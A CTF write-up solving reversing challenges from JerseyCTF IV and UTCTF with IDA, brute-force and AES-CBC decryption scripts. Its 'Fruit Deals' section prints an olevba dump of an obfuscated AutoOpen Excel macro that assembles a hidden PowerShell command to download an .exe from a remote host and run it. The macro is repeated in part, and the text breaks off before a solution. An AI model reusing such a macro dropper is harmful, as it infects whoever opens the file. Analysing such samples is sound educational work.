# WRITEUP JERSEYCTF IV & UTCTF

## I. Jersey CTF IV

### 1. PassWordManager

* Load the binary into IDA for static analysis.

![image](https://hackmd.io/_uploads/B1a-UFS1R.png)

* The code is fairly clear: set a breakpoint and set IP to jump to the `argc == 2` branch, then read the value out.

![image](https://hackmd.io/_uploads/S1tXsYSyC.png)

> jctf{wh3r3s_m@y@?}

### 2. The heist 1

* Load the challenge into IDA.

![image](https://hackmd.io/_uploads/Sk25ACq1A.png)

* The code is fairly clear: the program asks the user for a PIN, encrypts it by shifting left 4 bits and XORing with the constant `0x55` after each shift, and finally compares the result with the two constants `const_1` and `const_2`.
* We take the data from the two constants and brute-force to recover the original input that was encrypted.

```
# Candidate characters to try for each encrypted byte
brute_key = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+-=<>,./{[]\\|~:;?"\''

# Bytes taken from const_1 and const_2
key = [0xC3, 0x83, 0x23, 0x23, 0xB3, 0xC3, 0x83, 0xE3, 0xA3, 0xE3, 0x33, 0x0C]

def rol_byte(value, shift):
    # Rotate an 8-bit value left by `shift` bits
    return ((value << shift) & 0xFF) | ((value & 0xFF) >> (8 - shift))

def decrypt_byte(target_byte):
    # Encrypt every candidate the way the binary does and keep the one that matches
    for char in brute_key:
        encrypted_byte = (rol_byte((~(ord(char) + 96)) & 0xFF, 4) ^ 0x55)
        if encrypted_byte == target_byte:
            return char
    return ''

flag = ''.join(decrypt_byte(byte) for byte in key)
print(flag)
```

> jctf{62881624049}

### 3. The heist 2

* The file is packed with UPX, so unpack it with `upx -d vaul_control.exe` and load it into IDA.

![image](https://hackmd.io/_uploads/HyRVmm2yR.png)

* A quick look at `main` shows several characteristics of AES in the program. First we enter input, which is stored in `Buffer`.
* Next, `sub_140001000` is the key expansion function, which derives the round keys from the original key `v17`.
* To decrypt, we need to pick out the `key` and the initialization vector by tracing from the AES encryption function, then decrypt in CBC mode.
* Looking at `sub_140001000`, `v17` is the original key, so debug and read it out.

![image](https://hackmd.io/_uploads/BkQp3Q6kR.png)

* Next is the IV: we see 16 bytes that are XORed with the input in the loop at `loc_7FF6DC3C1820`.

![image](https://hackmd.io/_uploads/ByMQL4a1C.png)

* We now have the key, the IV and the ciphertext, so we can decrypt in CBC mode.

```
from Crypto.Cipher import AES

# Ciphertext compared against the encrypted input (two 16-byte blocks)
deco = [0x5C, 0xA3, 0x41, 0xAB, 0x64, 0xBA, 0xCF, 0xC3, 0xD0, 0x61, 0x1E, 0x18, 0x56, 0xA3, 0x2D, 0x1E,
        0xF6, 0x93, 0x87, 0x58, 0x09, 0x16, 0x8C, 0x63, 0x8C, 0x43, 0x2B, 0x9E, 0x6D, 0x73, 0x7F, 0xC5]

# 16 bytes XORed with the input before the first block is encrypted
iv = bytes.fromhex('697C742271495259527A77606F6A542D')
# Only the first 16 bytes of the dumped buffer are used as the key
key = bytes.fromhex("653C26273471785B3824637339767D61697C742271495259527A77606F6A542D")[:16]

deco = bytes(deco)
cipher = AES.new(key, AES.MODE_CBC, iv)
plaintext = cipher.decrypt(deco)
print(plaintext.decode('utf-8'))
```

> jctf{iLikE_M0ney$$$}

## II. UTCTF

### 1. BabyRev

* We are given an ELF file; load it into IDA and check `main`:

![image](https://hackmd.io/_uploads/rk3Yu4p1A.png)

* `main` only calls one function, `keygen`. Inside, `keygen` calls the functions `l1` through `l19` one after another while assigning a specific hex constant to `a1`, so we just pick out the constants and decode them to text.

```
0x75, 0x74, 0x66, 0x6c, 0x61, 0x67, 0x7b, 0x69, 0x5f, 0x63, 0x34, 0x6e, 0x5f, 0x72, 0x33, 0x76, 0x21, 0x7d
```

> utflag{i_c4n_r3v!}

### 2. Fruit Deals

* We are given an .xlsm file, probably an Excel workbook with a macro. I tried opening it and saw nothing interesting.

![image](https://hackmd.io/_uploads/rkxTA46yA.png)

* Opening the file and reading it this way doesn't seem to get us anywhere, so I used olevba to read the file's VBA.

```
XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)
olevba 0.60.1 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: deals.xlsm
Type: OpenXML
WARNING invalid value for PROJECTLCID_Id expected 0002 got 004A
WARNING invalid value for PROJECTLCID_Lcid expected 0409 got 0005
WARNING invalid value for PROJECTLCIDINVOKE_Id expected 0014 got 0002
WARNING invalid value for PROJECTCODEPAGE_Id expected 0003 got 0014
WARNING invalid value for PROJECTCODEPAGE_Size expected 0002 got 0004
WARNING invalid value for PROJECTNAME_Id expected 0004 got 0000
ERROR PROJECTNAME_SizeOfProjectName value not in range [1-128]: 131075
ERROR Error in _extract_vba
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/oletools/olevba.py", line 3526, in extract_macros
    for stream_path, vba_filename, vba_code in \
  File "/usr/local/lib/python3.8/dist-packages/oletools/olevba.py", line 2094, in _extract_vba
    project = VBA_Project(ole, vba_root, project_path, dir_path, relaxed)
  File "/usr/local/lib/python3.8/dist-packages/oletools/olevba.py", line 1752, in __init__
    projectdocstring_id = struct.unpack("<H", dir_stream.read(2))[0]
struct.error: unpack requires a buffer of 2 bytes
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook
in file: xl/vbaProject.bin - OLE stream: 'ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Sheet1
in file: xl/vbaProject.bin - OLE stream: 'Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Sheet2
in file: xl/vbaProject.bin - OLE stream: 'Sheet2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Module1
in file: xl/vbaProject.bin - OLE stream: 'Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub FillWithRandomBase64()
    Dim ws As Worksheet
    Dim rng As Range
    Dim i As Long
    Dim base64String As String

    ' Set worksheet
    Set ws = ThisWorkbook.Sheets("Sheet2") ' Change "Sheet1" to your sheet name

    ' Set range where you want to fill the base64 strings
    Set rng = ws.Range("A1:AA100") ' Change "A1:A100" to your desired range

    ' Clear previous content
    rng.ClearContents

    ' Seed the random number generator
    Randomize

    ' Loop through each cell in the range and fill with random base64 strings
    For i = 1 To rng.Cells.Count
        base64String = GenerateRandomBase64()
        rng.Cells(i).Value = base64String
    Next i
End Sub

Function GenerateRandomBase64() As String
    Dim base64Chars As String
    Dim i As Integer
    Dim base64String As String

    ' Define Base64 characters
    base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

    ' Generate random Base64 string
    For i = 1 To 8 ' Generates an 8-character Base64 string (which would correspond to 6 bytes of data)
        base64String = base64String & Mid(base64Chars, Int((Len(base64Chars) * Rnd) + 1), 1)
    Next i

    GenerateRandomBase64 = base64String
End Function
-------------------------------------------------------------------------------
VBA MACRO Module2
in file: xl/vbaProject.bin - OLE stream: 'Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub AutoOpen()
    Dim Retval
    Dim f As String
    Dim t53df028c67b2f07f1069866e345c8b85, qe32cd94f940ea527cf84654613d4fb5d, e5b138e644d624905ca8d47c3b8a2cf41, tfd753b886f3bd1f6da1a84488dee93f9, z92ea38976d53e8b557cd5bbc2cd3e0f8, xc6fd40b407cb3aac0d068f54af14362e As String
    xc6fd40b407cb3aac0d068f54af14362e = "$OrA, "
    If Sheets("Sheet2").Range("M62").Value = "Iuzaz/iA" Then
        xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "$jri);"
    End If
    If Sheets("Sheet2").Range("G80").Value = "bAcDPl8D" Then
        xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "Invok"
    End If
    e5b138e644d624905ca8d47c3b8a2cf41 = " = '"
    If Sheets("Sheet2").Range("P31").Value = "aI3bH4Rd" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "http"
    End If
    If Sheets("Sheet2").Range("B50").Value = "4L3bnaGQ" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "://f"
    End If
    If Sheets("Sheet2").Range("B32").Value = "QyycTMPU" Then
        xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "e-Ite"
    End If
    If Sheets("Sheet2").Range("K47").Value = "0kIbOvsu" Then
        xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "m $jri"
    End If
    If Sheets("Sheet2").Range("B45").Value = "/hRdSmbG" Then
        xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + ";brea"
    End If
    If Sheets("Sheet2").Range("D27").Value = "y9hFUyA8" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "ruit"
    End If
    If Sheets("Sheet2").Range("A91").Value = "De5234dF" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + ".ret3"
    End If
    If Sheets("Sheet2").Range("I35").Value = "DP7jRT2v" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + ".gan"
    End If
    If Sheets("Sheet2").Range("W48").Value = "/O/w/o57" Then
        xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "k;} c"
    End If
    If Sheets("Sheet2").Range("R18").Value = "FOtBe4id" Then
        xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "atch "
    End If
    If Sheets("Sheet2").Range("W6").Value = "9Vo7IQ+/" Then
        xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "{}"""
    End If
    If Sheets("Sheet2").Range("U24").Value = "hmDEjcAE" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "g/ma"
    End If
    If Sheets("Sheet2").Range("C96").Value = "1eDPj4Rc" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "lwar"
    End If
    If Sheets("Sheet2").Range("B93").Value = "A72nfg/f" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + ".rds8"
    End If
    If Sheets("Sheet2").Range("E90").Value = "HP5LRFms" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "e';$"
    End If
    tfd753b886f3bd1f6da1a84488dee93f9 = "akrz"
    If Sheets("Sheet2").Range("G39").Value = "MZZ/er++" Then
        tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "f3zsd"
    End If
    If Sheets("Sheet2").Range("B93").Value = "ZX42cd+3" Then
        tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "2832"
    End If
    If Sheets("Sheet2").Range("I15").Value = "e9x9ME+E" Then
        tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "0918"
    End If
    If Sheets("Sheet2").Range("T46").Value = "7b69F2SI" Then
        tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "2afd"
    End If
    If Sheets("Sheet2").Range("N25").Value = "Ga/NUmJu" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "CNTA"
    End If
    If Sheets("Sheet2").Range("N26").Value = "C1hrOgDr" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + " = '"
    End If
    If Sheets("Sheet2").Range("C58").Value = "PoX7qGEp" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "banA"
    End If
    If Sheets("Sheet2").Range("B53").Value = "see2d/f" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "Fl0dd"
    End If
    If Sheets("Sheet2").Range("Q2").Value = "VKVTo5f+" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "NA-H"
    End If
    t53df028c67b2f07f1069866e345c8b85 = "p"
    If Sheets("Sheet2").Range("L84").Value = "GSPMnc83" Then
        t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + "oWe"
    End If
    If Sheets("Sheet2").Range("H35").Value = "aCxE//3x" Then
        t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + "ACew"
    End If
    If Sheets("Sheet2").Range("R95").Value = "uIDW54Re" Then
        t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + "Rs"
    End If
    If Sheets("Sheet2").Range("A24").Value = "PKRtszin" Then
        t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + "HELL"
    End If
    If Sheets("Sheet2").Range("G33").Value = "ccEsz3te" Then
        t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + "L3c33"
    End If
    If Sheets("Sheet2").Range("P31").Value = "aI3bH4Rd" Then
        t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + " -c"
    End If
    If Sheets("Sheet2").Range("Z49").Value = "oKnlcgpo" Then
        tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "4';$"
    End If
    If Sheets("Sheet2").Range("F57").Value = "JoTVytPM" Then
        tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "jri="
    End If
    If Sheets("Sheet2").Range("M37").Value = "y7MxjsAO" Then
        tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "$env:"
    End If
    If Sheets("Sheet2").Range("E20").Value = "ap0EvV5r" Then
        tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "publ"
    End If
    z92ea38976d53e8b557cd5bbc2cd3e0f8 = "\'+$"
    If Sheets("Sheet2").Range("D11").Value = "Q/GXajeM" Then
        z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "CNTA"
    End If
    If Sheets("Sheet2").Range("B45").Value = "/hRdSmbG" Then
        z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "+'.ex"
    End If
    If Sheets("Sheet2").Range("D85").Value = "y4/6D38p" Then
        z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "e';tr"
    End If
    If Sheets("Sheet2").Range("P2").Value = "E45tTsBe" Then
        z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "4d2dx"
    End If
    If Sheets("Sheet2").Range("O72").Value = "lD3Ob4eQ" Then
        tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "ic+'"
    End If
    qe32cd94f940ea527cf84654613d4fb5d = "omm"
    If Sheets("Sheet2").Range("P24").Value = "d/v8oiH9" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "and"
    End If
    If Sheets("Sheet2").Range("V22").Value = "dI6oBK/K" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + " """
    End If
    If Sheets("Sheet2").Range("G1").Value = "zJ1AdN0x" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "$oa"
    End If
    If Sheets("Sheet2").Range("Y93").Value = "E/5234dF" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "e$3fn"
    End If
    If Sheets("Sheet2").Range("A12").Value = "X42fc3/=" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "av3ei"
    End If
    If Sheets("Sheet2").Range("F57").Value = "JoTVytPM" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "K ="
    End If
    If Sheets("Sheet2").Range("L99").Value = "t8PygQka" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + " ne"
    End If
    If Sheets("Sheet2").Range("X31").Value = "gGJBD5tp" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "w-o"
    End If
    If Sheets("Sheet2").Range("C42").Value = "Dq7Pu9Tm" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "bjec"
    End If
    If Sheets("Sheet2").Range("D22").Value = "X42/=rrE" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "aoX3&i"
    End If
    If Sheets("Sheet2").Range("T34").Value = "9u2uF9nM" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "t Ne"
    End If
    If Sheets("Sheet2").Range("G5").Value = "cp+qRR+N" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "t.We"
    End If
    If Sheets("Sheet2").Range("O17").Value = "Q8z4cV/f" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "bCli"
    End If
    If Sheets("Sheet2").Range("Y50").Value = "OML7UOYq" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "ent;"
    End If
    If Sheets("Sheet2").Range("P41").Value = "bG9LxJvN" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "$OrA"
    End If
    If Sheets("Sheet2").Range("L58").Value = "qK02fT5b" Then
        z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "y{$oa"
    End If
    If Sheets("Sheet2").Range("P47").Value = "hXelsG2H" Then
        z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "K.Dow"
    End If
    If Sheets("Sheet2").Range("A2").Value = "RcPl3722" Then
        z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "Ry.is"
    End If
    If Sheets("Sheet2").Range("G64").Value = "Kvap5Ma0" Then
        z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "nload"
    End If
    If Sheets("Sheet2").Range("H76").Value = "OjgR3YGk" Then
        z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "File("
    End If
    f = t53df028c67b2f07f1069866e345c8b85 + qe32cd94f940ea527cf84654613d4fb5d + e5b138e644d624905ca8d47c3b8a2cf41 + tfd753b886f3bd1f6da1a84488dee93f9 + z92ea38976d53e8b557cd5bbc2cd3e0f8 + xc6fd40b407cb3aac0d068f54af14362e
    Retval = Shell(f, 0)
    Dim URL As String
    URL = "https://www.youtube.com/watch?v=mYiBdMnIT88"
    ActiveWorkbook.FollowHyperlink URL
End Sub
-------------------------------------------------------------------------------
VBA MACRO Sheet3
in file: xl/vbaProject.bin - OLE stream: 'Sheet3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |AutoOpen            |Runs when the Word document is opened        |
|Suspicious|Shell               |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|IOC       |https://www.youtube.|URL                                          |
|          |com/watch?v=mYiBdMnI|                                             |
|          |T88                 |                                             |
|Base64    |l)b                 |bCli                                         |
|String    |                    |                                             |
+----------+--------------------+---------------------------------------------+
```

* The code is quite long, but we only need to pay attention to the `AutoOpen()` function and check the loop.

```
Sub AutoOpen()
    Dim Retval
    Dim f As String
    Dim t53df028c67b2f07f1069866e345c8b85, qe32cd94f940ea527cf84654613d4fb5d, e5b138e644d624905ca8d47c3b8a2cf41, tfd753b886f3bd1f6da1a84488dee93f9, z92ea38976d53e8b557cd5bbc2cd3e0f8, xc6fd40b407cb3aac0d068f54af14362e As String
    xc6fd40b407cb3aac0d068f54af14362e = "$OrA, "
    If Sheets("Sheet2").Range("M62").Value = "Iuzaz/iA" Then
        xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "$jri);"
    End If
    If Sheets("Sheet2").Range("G80").Value = "bAcDPl8D" Then
        xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "Invok"
    End If
    e5b138e644d624905ca8d47c3b8a2cf41 = " = '"
    If Sheets("Sheet2").Range("P31").Value = "aI3bH4Rd" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "http"
    End If
    If Sheets("Sheet2").Range("B50").Value = "4L3bnaGQ" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "://f"
    End If
    If Sheets("Sheet2").Range("B32").Value = "QyycTMPU" Then
        xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "e-Ite"
    End If
    If Sheets("Sheet2").Range("K47").Value = "0kIbOvsu" Then
        xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "m $jri"
    End If
    If Sheets("Sheet2").Range("B45").Value = "/hRdSmbG" Then
        xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + ";brea"
    End If
    If Sheets("Sheet2").Range("D27").Value = "y9hFUyA8" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "ruit"
    End If
    If Sheets("Sheet2").Range("A91").Value = "De5234dF" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + ".ret3"
    End If
    If Sheets("Sheet2").Range("I35").Value = "DP7jRT2v" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + ".gan"
    End If
    If Sheets("Sheet2").Range("W48").Value = "/O/w/o57" Then
        xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "k;} c"
    End If
    If Sheets("Sheet2").Range("R18").Value = "FOtBe4id" Then
        xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "atch "
    End If
    If Sheets("Sheet2").Range("W6").Value = "9Vo7IQ+/" Then
        xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "{}"""
    End If
    If Sheets("Sheet2").Range("U24").Value = "hmDEjcAE" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "g/ma"
    End If
    If Sheets("Sheet2").Range("C96").Value = "1eDPj4Rc" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "lwar"
    End If
    If Sheets("Sheet2").Range("B93").Value = "A72nfg/f" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + ".rds8"
    End If
    If Sheets("Sheet2").Range("E90").Value = "HP5LRFms" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "e';$"
    End If
    tfd753b886f3bd1f6da1a84488dee93f9 = "akrz"
    If Sheets("Sheet2").Range("G39").Value = "MZZ/er++" Then
        tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "f3zsd"
    End If
    If Sheets("Sheet2").Range("B93").Value = "ZX42cd+3" Then
        tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "2832"
    End If
    If Sheets("Sheet2").Range("I15").Value = "e9x9ME+E" Then
        tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "0918"
    End If
    If Sheets("Sheet2").Range("T46").Value = "7b69F2SI" Then
        tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "2afd"
    End If
    If Sheets("Sheet2").Range("N25").Value = "Ga/NUmJu" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "CNTA"
    End If
    If Sheets("Sheet2").Range("N26").Value = "C1hrOgDr" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + " = '"
    End If
    If Sheets("Sheet2").Range("C58").Value = "PoX7qGEp" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "banA"
    End If
    If Sheets("Sheet2").Range("B53").Value = "see2d/f" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "Fl0dd"
    End If
    If Sheets("Sheet2").Range("Q2").Value = "VKVTo5f+" Then
        e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "NA-H"
    End If
    t53df028c67b2f07f1069866e345c8b85 = "p"
    If Sheets("Sheet2").Range("L84").Value = "GSPMnc83" Then
        t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + "oWe"
    End If
    If Sheets("Sheet2").Range("H35").Value = "aCxE//3x" Then
        t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + "ACew"
    End If
    If Sheets("Sheet2").Range("R95").Value = "uIDW54Re" Then
        t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + "Rs"
    End If
    If Sheets("Sheet2").Range("A24").Value = "PKRtszin" Then
        t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + "HELL"
    End If
    If Sheets("Sheet2").Range("G33").Value = "ccEsz3te" Then
        t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + "L3c33"
    End If
    If Sheets("Sheet2").Range("P31").Value = "aI3bH4Rd" Then
        t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + " -c"
    End If
    If Sheets("Sheet2").Range("Z49").Value = "oKnlcgpo" Then
        tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "4';$"
    End If
    If Sheets("Sheet2").Range("F57").Value = "JoTVytPM" Then
        tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "jri="
    End If
    If Sheets("Sheet2").Range("M37").Value = "y7MxjsAO" Then
        tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "$env:"
    End If
    If Sheets("Sheet2").Range("E20").Value = "ap0EvV5r" Then
        tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "publ"
    End If
    z92ea38976d53e8b557cd5bbc2cd3e0f8 = "\'+$"
    If Sheets("Sheet2").Range("D11").Value = "Q/GXajeM" Then
        z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "CNTA"
    End If
    If Sheets("Sheet2").Range("B45").Value = "/hRdSmbG" Then
        z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "+'.ex"
    End If
    If Sheets("Sheet2").Range("D85").Value = "y4/6D38p" Then
        z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "e';tr"
    End If
    If Sheets("Sheet2").Range("P2").Value = "E45tTsBe" Then
        z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "4d2dx"
    End If
    If Sheets("Sheet2").Range("O72").Value = "lD3Ob4eQ" Then
        tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "ic+'"
    End If
    qe32cd94f940ea527cf84654613d4fb5d = "omm"
    If Sheets("Sheet2").Range("P24").Value = "d/v8oiH9" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "and"
    End If
    If Sheets("Sheet2").Range("V22").Value = "dI6oBK/K" Then
        qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + " """
    End If
